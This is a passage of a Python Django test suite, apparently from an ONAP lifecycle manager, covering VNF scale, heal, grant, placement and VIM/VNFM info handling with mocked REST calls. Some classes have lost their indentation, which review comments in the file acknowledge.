def test_scale_vnf_when_job_fail(self, mock_call_req, mock_sleep):
scale_service = NFManualScaleService(self.nf_inst_id, self.data)
job_info = {
"jobId": scale_service.job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.ERROR}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/scale":
[0, json.JSONEncoder().encode({"jobId": scale_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/jobs/" + scale_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
scale_service.run()
nsIns = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nsIns.status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
# Malformed payload (scaleVnfData as a list) must make the service error out.
def test_scale_vnf_when_exception(self):
req_data = {
"scaleVnfData": [
{
"type": "SCALE_OUT",
"aspectId": "demo_aspect1",
"numberOfSteps": 1,
},
{
"type": "SCALE_OUT",
"aspectId": "demo_aspect2",
"numberOfSteps": 1,
}
]
}
scale_service = NFManualScaleService(self.nf_inst_id, req_data)
scale_service.run()
nsIns = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nsIns.status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
# Unknown NF instance id: job ends in ERROR.
def test_scale_vnf_when_nf_instance_does_not_exist(self):
req_data = {
"scaleVnfData":
{
"type": "SCALE_OUT",
"aspectId": "demo_aspect1",
"numberOfSteps": 1,
}
}
scale_service = NFManualScaleService("nf_instance_does_not_exist", req_data)
scale_service.run()
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
# Empty scaleVnfData: job ends in ERROR, NF untouched.
def test_scale_vnf_when_scale_vnf_data_does_not_exist(self):
req_data = {
"scaleVnfData": {}
}
scale_service = NFManualScaleService(self.nf_inst_id, req_data)
scale_service.run()
nsIns = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nsIns.status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
# Tests for VNF healing via NFHealService (vmReset action) under mocked driver replies.
# NOTE(review): indentation was lost in this dump; code lines are kept byte-identical.
class TestHealVnfViews(TestCase):
def setUp(self):
# Fixtures: NS, two NF records (one with a matching VNFC/VM pair, one
# "non_vud_id" without), plus the VNFC/VM rows the heal lookup resolves.
self.client = Client()
self.ns_inst_id = str(uuid.uuid4())
self.nf_inst_id = str(uuid.uuid4())
self.nf_uuid = "111"
self.data = {
"action": "vmReset",
"affectedvm": {
"vmid": "1",
"vduid": "1",
"vmname": "name",
},
"additionalParams": {
"actionvminfo": {
"vmid": "vm_id_001",
}
}
}
NSInstModel(id=self.ns_inst_id, name="ns_name").save()
NfInstModel.objects.create(nfinstid=self.nf_inst_id, status=VNF_STATUS.NULL, vnfm_inst_id="vnfm_inst_id_001",
mnfinstid="m_nf_inst_id_001")
NfInstModel.objects.create(nfinstid="non_vud_id", status=VNF_STATUS.NULL, vnfm_inst_id="vnfm_inst_id_001",
mnfinstid="m_nf_inst_id_001")
VNFCInstModel.objects.create(nfinstid=self.nf_inst_id, vmid="vm_id_001", vduid="vdu_id_001")
VmInstModel.objects.create(resouceid="vm_id_001", vmname="vm_name_001")
def tearDown(self):
NSInstModel.objects.all().delete()
NfInstModel.objects.all().delete()
# Happy path: driver heal succeeds and the polled job reaches FINISHED.
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_heal_vnf_success(self, mock_call_req, mock_sleep):
heal_service = NFHealService(self.nf_inst_id, self.data)
# call_req is dispatched on its 5th positional argument (the resource URL).
mock_vals = {
"/test/bins/1?timeout=15000":
[0, json.JSONEncoder().encode(['{"powering-off": "", "instance_id": "vm_id_001", '
'"display_name": ""}']), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/heal":
[0, json.JSONEncoder().encode({"jobId": heal_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/jobs/" + heal_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode({
"jobId": heal_service.job_id,
"responsedescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"responsehistorylist": [{
"progress": "0",
"status": JOB_MODEL_STATUS.PROCESSING,
"responseid": "2",
"statusdescription": "creating",
"errorcode": "0"
}]
}
}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.FINISHED, jobs.progress)
# Unknown NF id: the fixture NF is untouched (still NULL) and the job errors.
def test_heal_vnf_when_non_existing_vnf(self, ):
heal_service = NFHealService("on_existing_vnf", self.data)
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.NULL)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
# Missing additionalParams: request is rejected, job errors.
def test_heal_vnf_when_additional_params_non_exist(self):
data = {"action": "vmReset"}
heal_service = NFHealService(self.nf_inst_id, data)
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.NULL)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
# NF without a matching VNFC/VDU row: heal cannot resolve the VM, job errors.
def test_heal_vnf_when_non_vud_id(self, ):
heal_service = NFHealService("non_vud_id", self.data)
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid="non_vud_id").status, VNF_STATUS.NULL)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
# Driver reply carries no jobId: the service treats the heal as done immediately.
@mock.patch.object(restcall, "call_req")
def test_heal_vnf_when_no_vnfm_job_id(self, mock_call_req):
heal_service = NFHealService(self.nf_inst_id, self.data)
mock_vals = {
"/test/bins/1?timeout=15000":
[0, json.JSONEncoder().encode(['{"powering-off": "", "instance_id": "vm_id_001", '
'"display_name": ""}']), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/heal":
[0, json.JSONEncoder().encode({}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.FINISHED, jobs.progress)
# Polled job reports ERROR: NF is left in HEALING and the job errors.
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_heal_vnf_when_job_bot_finish(self, mock_call_req, mock_sleep):
heal_service = NFHealService(self.nf_inst_id, self.data)
mock_vals = {
"/test/bins/1?timeout=15000":
[0, json.JSONEncoder().encode(['{"powering-off": "", "instance_id": "vm_id_001", '
'"display_name": ""}']), "200"],
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/heal":
[0, json.JSONEncoder().encode({"jobId": heal_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/jobs/" + heal_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode({
"jobId": heal_service.job_id,
"responsedescriptor": {
"status": JOB_MODEL_STATUS.ERROR,
"responsehistorylist": [{
"progress": "0",
"status": JOB_MODEL_STATUS.PROCESSING,
"responseid": "2",
"statusdescription": "creating",
"errorcode": "0"
}]
}
}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
heal_service.run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.HEALING)
jobs = JobModel.objects.get(jobid=heal_service.job_id)
self.assertEqual(JOB_PROGRESS.ERROR, jobs.progress)
class TestGetVnfmInfoViews(TestCase):
    """Tests for the VNFM-info query endpoint (/api/nslcm/v1/vnfms/<id>)."""

    def setUp(self):
        self.client = Client()
        self.vnfm_id = str(uuid.uuid4())

    def tearDown(self):
        # No DB fixtures are created, so there is nothing to clean up.
        pass

    @mock.patch.object(restcall, "call_req")
    def test_get_vnfm_info(self, mock_call_req):
        # Canned AAI record that the mocked rest call hands back.
        vnfm_record = {
            "vnfm-id": "example-vnfm-id-val-62576",
            "vim-id": "example-vim-id-val-35114",
            "certificate-url": "example-certificate-url-val-90242",
            "esr-system-info-list": {
                "esr-system-info": [
                    {
                        "esr-system-info-id": "example-esr-system-info-id-val-78484",
                        "system-name": "example-system-name-val-23790",
                        "type": "example-type-val-52596",
                        "vendor": "example-vendor-val-47399",
                        "version": "example-version-val-42051",
                        "service-url": "example-service-url-val-10731",
                        "user-name": "example-user-name-val-65946",
                        "password": "example-password-val-22505",
                        "system-type": "example-system-type-val-27221",
                        "protocal": "example-protocal-val-54632",
                        "ssl-cacert": "example-ssl-cacert-val-45965",
                        "ssl-insecure": True,
                        "ip-address": "example-ip-address-val-19212",
                        "port": "example-port-val-57641",
                        "cloud-domain": "example-cloud-domain-val-26296",
                        "default-tenant": "example-default-tenant-val-87724"
                    }
                ]
            }
        }
        mock_call_req.side_effect = [[0, json.dumps(vnfm_record), "200"]]
        # Expected view output mirrors the AAI record's first esr-system-info entry.
        esr_info = ignore_case_get(ignore_case_get(vnfm_record, "esr-system-info-list"), "esr-system-info")
        expected = {
            "vnfmId": vnfm_record["vnfm-id"],
            "name": vnfm_record["vnfm-id"],
            "type": ignore_case_get(esr_info[0], "type"),
            "vimId": vnfm_record["vim-id"],
            "vendor": ignore_case_get(esr_info[0], "vendor"),
            "version": ignore_case_get(esr_info[0], "version"),
            "description": "vnfm",
            "certificateUrl": vnfm_record["certificate-url"],
            "url": ignore_case_get(esr_info[0], "service-url"),
            "userName": ignore_case_get(esr_info[0], "user-name"),
            "password": ignore_case_get(esr_info[0], "password"),
            "createTime": ""
        }
        resp = self.client.get("/api/nslcm/v1/vnfms/%s" % self.vnfm_id)
        self.assertEqual(status.HTTP_200_OK, resp.status_code, resp.content)
        self.assertEqual(expected, json.loads(resp.content))
class TestGetVimInfoViews(TestCase):
    """Tests for the VIM-info query endpoint (/api/nslcm/v1/vims/<owner>/<region>)."""

    def setUp(self):
        self.client = Client()
        self.vim_id = {"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}

    def tearDown(self):
        # No DB fixtures are created, so there is nothing to clean up.
        pass

    @mock.patch.object(restcall, "call_req")
    def test_get_vim_info(self, mock_call_req):
        # The mocked rest call serves the shared vim_info test fixture.
        mock_call_req.side_effect = [[0, json.dumps(vim_info), "200"]]
        esr_info = ignore_case_get(ignore_case_get(vim_info, "esr-system-info-list"), "esr-system-info")
        expected = {
            "vimId": self.vim_id,
            "name": self.vim_id,
            "url": ignore_case_get(esr_info[0], "service-url"),
            "userName": ignore_case_get(esr_info[0], "user-name"),
            "password": ignore_case_get(esr_info[0], "password"),
            # "tenant": ignore_case_get(tenants[0], "tenant-id"),
            "tenant": ignore_case_get(esr_info[0], "default-tenant"),
            "vendor": ignore_case_get(esr_info[0], "vendor"),
            "version": ignore_case_get(esr_info[0], "version"),
            "description": "vim",
            "domain": "",
            "type": ignore_case_get(esr_info[0], "type"),
            "createTime": ""
        }
        # response = self.client.get("/api/nslcm/v1/vims/%s" % self.vim_id)
        url = "/api/nslcm/v1/vims/%s/%s" % (self.vim_id["cloud_owner"], self.vim_id["cloud_regionid"])
        resp = self.client.get(url)
        self.assertEqual(status.HTTP_200_OK, resp.status_code)
        body = json.loads(resp.content)
        # Only the url field is pinned; the rest of `expected` documents the contract.
        self.assertEqual(expected["url"], body["url"])
# Tests for PlaceVnfs.extract(): parsing OOF placement responses into OOFDataModel rows.
# NOTE(review): indentation was lost in this dump; code lines are kept byte-identical.
class TestPlaceVnfViews(TestCase):
def setUp(self):
# One pending OOF request row keyed by request/transaction id "1234"; each test
# feeds extract() a response and checks how the row is updated.
self.vnf_inst_id = "1234"
self.vnf_id = "vG"
self.client = Client()
self.url = "/api/nslcm/v1/ns/placevnf"
self.data = vnf_place_request
OOFDataModel.objects.all().delete()
OOFDataModel.objects.create(
request_id="1234",
transaction_id="1234",
request_status="init",
request_module_name=self.vnf_id,
service_resource_id=self.vnf_inst_id,
vim_id="",
cloud_owner="",
cloud_region_id="",
vdu_info="",
)
def tearDown(self):
OOFDataModel.objects.all().delete()
# Full, well-formed OOF response: row gets completed status, parsed vim/cloud
# fields and the serialized vdu info.
@mock.patch.object(restcall, "call_req")
def test_place_vnf(self, mock_call_req):
vdu_info_json = [{
"vduName": "vG_0",
"flavorName": "HPA.flavor.1",
"flavorId": "12345",
"directive": []
}]
# response = self.client.post(self.url, data=self.data)
PlaceVnfs(vnf_place_request).extract()
db_info = OOFDataModel.objects.filter(request_id=vnf_place_request.get("requestId"), transaction_id=vnf_place_request.get("transactionId"))
self.assertEqual(db_info[0].request_status, "completed")
self.assertEqual(db_info[0].vim_id, "CloudOwner1_DLLSTX1A")
self.assertEqual(db_info[0].cloud_owner, "CloudOwner1")
self.assertEqual(db_info[0].cloud_region_id, "DLLSTX1A")
self.assertEqual(db_info[0].vdu_info, json.dumps(vdu_info_json))
# Non-completed ("pending") response: status is recorded but all placement
# fields fall back to "none".
def test_place_vnf_with_invalid_response(self):
resp = {
"requestId": "1234",
"transactionId": "1234",
"statusMessage": "xx",
"requestStatus": "pending",
"solutions": {
"placementSolutions": [
[
{
"resourceModuleName": self.vnf_id,
"serviceResourceId": self.vnf_inst_id,
"solution": {
"identifierType": "serviceInstanceId",
"identifiers": [
"xx"
],
"cloudOwner": "CloudOwner1 "
},
"assignmentInfo": []
}
]
],
"licenseSolutions": [
{
"resourceModuleName": "string",
"serviceResourceId": "string",
"entitlementPoolUUID": [
"string"
],
"licenseKeyGroupUUID": [
"string"
],
"entitlementPoolInvariantUUID": [
"string"
],
"licenseKeyGroupInvariantUUID": [
"string"
]
}
]
}
}
PlaceVnfs(resp).extract()
db_info = OOFDataModel.objects.filter(request_id=resp.get("requestId"), transaction_id=resp.get("transactionId"))
self.assertEqual(db_info[0].request_status, "pending")
self.assertEqual(db_info[0].vim_id, "none")
self.assertEqual(db_info[0].cloud_owner, "none")
self.assertEqual(db_info[0].cloud_region_id, "none")
self.assertEqual(db_info[0].vdu_info, "none")
# Completed response missing assignmentInfo: placement fields default to "none".
def test_place_vnf_with_no_assignment_info(self):
resp = {
"requestId": "1234",
"transactionId": "1234",
"statusMessage": "xx",
"requestStatus": "completed",
"solutions": {
"placementSolutions": [
[
{
"resourceModuleName": self.vnf_id,
"serviceResourceId": self.vnf_inst_id,
"solution": {
"identifierType": "serviceInstanceId",
"identifiers": [
"xx"
],
"cloudOwner": "CloudOwner1 "
}
}
]
],
"licenseSolutions": [
{
"resourceModuleName": "string",
"serviceResourceId": "string",
"entitlementPoolUUID": [
"string"
],
"licenseKeyGroupUUID": [
"string"
],
"entitlementPoolInvariantUUID": [
"string"
],
"licenseKeyGroupInvariantUUID": [
"string"
]
}
]
}
}
PlaceVnfs(resp).extract()
db_info = OOFDataModel.objects.filter(request_id=resp.get("requestId"), transaction_id=resp.get("transactionId"))
self.assertEqual(db_info[0].request_status, "completed")
self.assertEqual(db_info[0].vim_id, "none")
self.assertEqual(db_info[0].cloud_owner, "none")
self.assertEqual(db_info[0].cloud_region_id, "none")
self.assertEqual(db_info[0].vdu_info, "none")
# assignmentInfo present but without the directives entry: fields still "none".
# NOTE(review): "licenseSoutions" below is spelled differently from
# "licenseSolutions" in the earlier payloads -- likely a typo in the test data;
# it appears unused by extract(), but confirm before relying on it.
def test_place_vnf_no_directives(self):
resp = {
"requestId": "1234",
"transactionId": "1234",
"statusMessage": "xx",
"requestStatus": "completed",
"solutions": {
"placementSolutions": [
[
{
"resourceModuleName": self.vnf_id,
"serviceResourceId": self.vnf_inst_id,
"solution": {
"identifierType": "serviceInstanceId",
"identifiers": [
"xx"
],
"cloudOwner": "CloudOwner1 "
},
"assignmentInfo": [
{"key": "locationId",
"value": "DLLSTX1A"
}
]
}
]
],
"licenseSoutions": [
{
"resourceModuleName": "string",
"serviceResourceId": "string",
"entitlementPoolUUID": [
"string"
],
"licenseKeyGroupUUID": [
"string"
],
"entitlementPoolInvariantUUID": [
"string"
],
"licenseKeyGroupInvariantUUID": [
"string"
]
}
]
}
}
PlaceVnfs(resp).extract()
db_info = OOFDataModel.objects.filter(request_id=resp.get("requestId"), transaction_id=resp.get("transactionId"))
self.assertEqual(db_info[0].request_status, "completed")
self.assertEqual(db_info[0].vim_id, "none")
self.assertEqual(db_info[0].cloud_owner, "none")
self.assertEqual(db_info[0].cloud_region_id, "none")
self.assertEqual(db_info[0].vdu_info, "none")
# Empty solution lists: status recorded, placement fields all "none".
def test_place_vnf_with_no_solution(self):
resp = {
"requestId": "1234",
"transactionId": "1234",
"statusMessage": "xx",
"requestStatus": "completed",
"solutions": {
"placementSolutions": [],
"licenseSoutions": []
}
}
PlaceVnfs(resp).extract()
db_info = OOFDataModel.objects.filter(request_id=resp.get("requestId"), transaction_id=resp.get("transactionId"))
self.assertEqual(db_info[0].request_status, "completed")
self.assertEqual(db_info[0].vim_id, "none")
self.assertEqual(db_info[0].cloud_owner, "none")
self.assertEqual(db_info[0].cloud_region_id, "none")
self.assertEqual(db_info[0].vdu_info, "none")
class TestGrantVnfsViews(TestCase):
    """Tests for GrantVnfs.send_grant_vnf_to_resMgr with add/remove resources."""

    # Grant answer expected from the mocked vim_info fixture (shared by both tests).
    return_success = {"vim": {"accessInfo": {"tenant": "admin"},
                              "vimId": "example-cloud-owner-val-97336_example-cloud-region-id-val-35532"}}

    def setUp(self):
        self.vnf_inst_id = str(uuid.uuid4())
        self.data = {
            "vnfInstanceId": self.vnf_inst_id,
            "lifecycleOperation": LIFE_CYCLE_OPERATION.INSTANTIATE,
            "addResource": [{"type": RESOURCE_CHANGE_TYPE.VDU, "vdu": "vdu_grant_vnf_add_resources"}],
            "additionalParam": {
                "vnfmid": "vnfm_inst_id_001",
                "vimid": '{"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}'
            }
        }
        self.client = Client()
        self.url = "/api/nslcm/v1/ns/grantvnf"
        NfInstModel(mnfinstid=self.vnf_inst_id, nfinstid="vnf_inst_id_001", package_id="package_id_001",
                    vnfm_inst_id="vnfm_inst_id_001").save()

    def tearDown(self):
        OOFDataModel.objects.all().delete()
        NfInstModel.objects.all().delete()

    @staticmethod
    def _install_call_req_mock(mock_call_req):
        """Route restcall.call_req by URL (args[4]) to canned catalog/resmgr/AAI answers."""
        mock_vals = {
            "/api/catalog/v1/vnfpackages/package_id_001":
                [0, json.JSONEncoder().encode(nf_package_info), "200"],
            "/api/resmgr/v1/resource/grant":
                [1, json.JSONEncoder().encode({}), "200"],
            "/cloud-infrastructure/cloud-regions/cloud-region/VCPE/RegionOne?depth=all":
                [0, json.JSONEncoder().encode(vim_info), "201"],
        }

        def side_effect(*args):
            return mock_vals[args[4]]
        mock_call_req.side_effect = side_effect

    # @mock.patch.object(restcall, "call_req")
    # def test_nf_grant_view(self, mock_call_req):
    #     mock_vals = {
    #         "/api/catalog/v1/vnfpackages/package_id_001":
    #             [0, json.JSONEncoder().encode(nf_package_info), "200"],
    #         "/api/resmgr/v1/resource/grant":
    #             [1, json.JSONEncoder().encode({}), "200"],
    #         "/cloud-infrastructure/cloud-regions/cloud-region/VCPE/RegionOne?depth=all":
    #             [0, json.JSONEncoder().encode(vim_info), "201"],
    #     }
    #
    #     def side_effect(*args):
    #         return mock_vals[args[4]]
    #
    #     mock_call_req.side_effect = side_effect
    #     data = {
    #         "vnfInstanceId": self.vnf_inst_id,
    #         "lifecycleOperation": LIFE_CYCLE_OPERATION.INSTANTIATE
    #     }
    #     response = self.client.post(self.url, data=data)
    #     self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    @mock.patch.object(restcall, "call_req")
    def test_nf_grant_view_when_add_resource(self, mock_call_req):
        """Granting with addResource returns the vim access info resolved from AAI."""
        self._install_call_req_mock(mock_call_req)
        resp = GrantVnfs(json.dumps(self.data), "").send_grant_vnf_to_resMgr()
        self.assertEqual(resp, self.return_success)

    @mock.patch.object(restcall, "call_req")
    def test_nf_grant_view_when_remove_resource(self, mock_call_req):
        """Granting with removeResource returns the same vim access info."""
        self._install_call_req_mock(mock_call_req)
        self.data.pop("addResource")
        self.data["removeResource"] = [{"vdu": "vdu_grant_vnf_remove_resources"}]
        resp = GrantVnfs(json.dumps(self.data), "").send_grant_vnf_to_resMgr()
        self.assertEqual(resp, self.return_success)
class TestGrantVnfViews(TestCase):
    """Tests for the SOL003 grants endpoint and GrantVnf.exec_grant."""

    def setUp(self):
        self.vnf_inst_id = str(uuid.uuid4())
        self.data = {
            "vnfInstanceId": self.vnf_inst_id,
            "vnfLcmOpOccId": "vnf_lcm_op_occ_id",
            "addResources": [{"vdu": "vdu_grant_vnf_add_resources"}],
            "operation": "INSTANTIATE"
        }
        self.client = Client()
        # OOF placement answer for this instance: flavour flavor_id_001 on cloudOwner/casa.
        vdu_info_dict = [{"vduName": "vg", "flavorName": "flavor_1", "flavorId": "flavor_id_001", "directive": []}]
        OOFDataModel(request_id="request_id_001", transaction_id="transaction_id_001", request_status="done",
                     request_module_name="vg", service_resource_id=self.vnf_inst_id, vim_id="cloudOwner_casa",
                     cloud_owner="cloudOwner", cloud_region_id="casa", vdu_info=json.dumps(vdu_info_dict)).save()
        NfInstModel(mnfinstid=self.vnf_inst_id, nfinstid="vnf_inst_id_001", package_id="package_id_001",
                    vnfm_inst_id="vnfm_id_001").save()

    def tearDown(self):
        OOFDataModel.objects.all().delete()
        NfInstModel.objects.all().delete()

    @staticmethod
    def _resmgr_grant_resp():
        """Fresh copy of the canned resmgr grant answer (fresh so tests cannot leak mutations)."""
        return {
            "vim": {
                "vimId": "cloudOwner_casa",
                "accessInfo": {
                    "tenant": "tenantA"
                }
            }
        }

    @staticmethod
    def _install_catalog_mock(mock_call_req, package_id):
        """Route restcall.call_req (by url, args[4]) to a canned catalog answer for package_id."""
        mock_vals = {
            "/api/catalog/v1/vnfpackages/%s" % package_id:
                [0, json.JSONEncoder().encode(nf_package_info), "200"],
        }

        def side_effect(*args):
            return mock_vals[args[4]]
        mock_call_req.side_effect = side_effect

    def _assert_compute_flavour(self, grant_result):
        """The grant answer must carry the flavour resolved from the OOF record in setUp."""
        flavour = grant_result["vimAssets"]["computeResourceFlavours"][0]
        self.assertEqual(flavour["vimConnectionId"], "cloudOwner_casa")
        self.assertEqual(flavour["resourceProviderId"], "vg")
        self.assertEqual(flavour["vimFlavourId"], "flavor_id_001")

    def _assert_vim_connections(self, resp):
        """Without an OOF record the grant exposes the resmgr vim as a single vimConnection."""
        self.assertEqual(resp["vimConnections"], [{
            "id": "cloudOwner_casa",
            "vimId": "cloudOwner_casa",
            "vimType": None,
            "interfaceInfo": None,
            "accessInfo": {"tenant": "tenantA"},
            "extra": None
        }])

    @mock.patch.object(grant_vnf, "vim_connections_get")
    def test_vnf_grant_view(self, mock_grant):
        """Posting a grant without addResources is created and returns the OOF flavour."""
        mock_grant.return_value = self._resmgr_grant_resp()
        self.data.pop("addResources")
        response = self.client.post("/api/nslcm/v2/grants", data=self.data)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self._assert_compute_flavour(response.data)

    @mock.patch.object(restcall, "call_req")
    @mock.patch.object(grant_vnf, "vim_connections_get")
    def test_exec_grant_when_add_resources_success(self, mock_grant, mock_call_req):
        """exec_grant with addResources resolves the flavour from the OOF record."""
        self._install_catalog_mock(mock_call_req, "package_id_001")
        mock_grant.return_value = self._resmgr_grant_resp()
        resp = GrantVnf(json.dumps(self.data)).exec_grant()
        self._assert_compute_flavour(resp)

    def test_exec_grant_when_add_resources_but_no_vnfinst(self):
        """exec_grant must raise NSLCMException for an unknown vnf instance id."""
        self.data["vnfInstanceId"] = "no_vnfinst"
        self.assertRaises(NSLCMException, GrantVnf(json.dumps(self.data)).exec_grant)

    @mock.patch.object(time, "sleep")
    @mock.patch.object(restcall, "call_req")
    @mock.patch.object(grant_vnf, "vim_connections_get")
    def test_exec_grant_when_add_resources_but_no_off(self, mock_grant, mock_call_req, mock_sleep):
        """Without an OOF record the grant falls back to the resmgr vim connection."""
        NfInstModel(mnfinstid="add_resources_but_no_off", nfinstid="vnf_inst_id_002",
                    package_id="package_id_002").save()
        mock_sleep.return_value = None
        self._install_catalog_mock(mock_call_req, "package_id_002")
        mock_grant.return_value = self._resmgr_grant_resp()
        self.data["vnfInstanceId"] = "add_resources_but_no_off"
        resp = GrantVnf(json.dumps(self.data)).exec_grant()
        self.assertEqual(resp["vnfInstanceId"], "add_resources_but_no_off")
        self.assertEqual(resp["vnfLcmOpOccId"], "vnf_lcm_op_occ_id")
        self._assert_vim_connections(resp)

    @mock.patch.object(grant_vnf, "vim_connections_get")
    def test_exec_grant_when_resource_template_in_add_resources(self, mock_grant):
        """A plain 'resourceTemplate' entry among addResources is tolerated."""
        mock_grant.return_value = self._resmgr_grant_resp()
        self.data["addResources"] = [{"vdu": "vdu_grant_vnf_add_resources"}, "resourceTemplate"]
        resp = GrantVnf(json.dumps(self.data)).exec_grant()
        self._assert_compute_flavour(resp)

    @mock.patch.object(restcall, "call_req")
    @mock.patch.object(grant_vnf, "vim_connections_get")
    def test_exec_grant_when_remove_resources_success(self, mock_grant, mock_call_req):
        """exec_grant with removeResources resolves the flavour from the OOF record."""
        self._install_catalog_mock(mock_call_req, "package_id_001")
        mock_grant.return_value = self._resmgr_grant_resp()
        self.data.pop("addResources")
        self.data["removeResources"] = [{"vdu": "vdu_grant_vnf_remove_resources"}]
        self.data["additionalparams"] = {"vnfmid": "vnfm_id_001"}
        resp = GrantVnf(json.dumps(self.data)).exec_grant()
        self._assert_compute_flavour(resp)

    def test_exec_grant_when_remove_resources_no_vnfinst(self):
        """exec_grant must raise NSLCMException when no instance matches the vnfm id."""
        self.data.pop("addResources")
        self.data["removeResources"] = [{"vdu": "vdu_grant_vnf_remove_resources"}]
        self.data["additionalparams"] = {"vnfmid": "vnfm_id_002"}
        self.assertRaises(NSLCMException, GrantVnf(json.dumps(self.data)).exec_grant)

    @mock.patch.object(time, "sleep")
    @mock.patch.object(restcall, "call_req")
    @mock.patch.object(grant_vnf, "vim_connections_get")
    def test_exec_grant_when_remove_resources_but_no_off(self, mock_grant, mock_call_req, mock_sleep):
        """Remove flow without an OOF record also falls back to the resmgr vim connection."""
        NfInstModel(mnfinstid="remove_resources_but_no_off", nfinstid="vnf_inst_id_002", package_id="package_id_002",
                    vnfm_inst_id="vnfm_id_002").save()
        mock_sleep.return_value = None
        self._install_catalog_mock(mock_call_req, "package_id_002")
        mock_grant.return_value = self._resmgr_grant_resp()
        self.data["vnfInstanceId"] = "remove_resources_but_no_off"
        self.data.pop("addResources")
        self.data["removeResources"] = [{"vdu": "vdu_grant_vnf_remove_resources"}]
        self.data["additionalparams"] = {"vnfmid": "vnfm_id_002"}
        resp = GrantVnf(json.dumps(self.data)).exec_grant()
        self.assertEqual(resp["vnfInstanceId"], "remove_resources_but_no_off")
        self.assertEqual(resp["vnfLcmOpOccId"], "vnf_lcm_op_occ_id")
        self._assert_vim_connections(resp)

    @mock.patch.object(grant_vnf, "vim_connections_get")
    def test_exec_grant_when_resource_template_in_remove_resources(self, mock_grant):
        """A plain 'resourceTemplate' entry among removeResources is tolerated."""
        mock_grant.return_value = self._resmgr_grant_resp()
        self.data.pop("addResources")
        self.data["removeResources"] = [{"vdu": "vdu_grant_vnf_remove_resources"}, "resourceTemplate"]
        resp = GrantVnf(json.dumps(self.data)).exec_grant()
        self._assert_compute_flavour(resp)
class TestCreateVnfViews(TestCase):
    """Tests for the create-vnf endpoint and the CreateVnfs worker thread."""

    def setUp(self):
        self.ns_inst_id = str(uuid.uuid4())
        self.job_id = str(uuid.uuid4())
        self.data = {
            "vnfIndex": "1",
            "nsInstanceId": self.ns_inst_id,
            # "additionalParamForNs": {"inputs": json.dumps({})},
            "additionalParamForVnf": [
                {
                    "vnfprofileid": "VBras",
                    "additionalparam": {
                        "inputs": json.dumps({
                            "vnf_param1": "11",
                            "vnf_param2": "22"
                        }),
                        "vnfminstanceid": "1",
                        # "vimId": "zte_test",
                        "vimId": '{"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}'
                    }
                }
            ]
        }
        self.client = Client()
        NSInstModel(id=self.ns_inst_id, name="ns", nspackage_id="1", nsd_id="nsd_id", description="description",
                    status="instantiating", nsd_model=json.dumps(nsd_model_dict), create_time=now_time(),
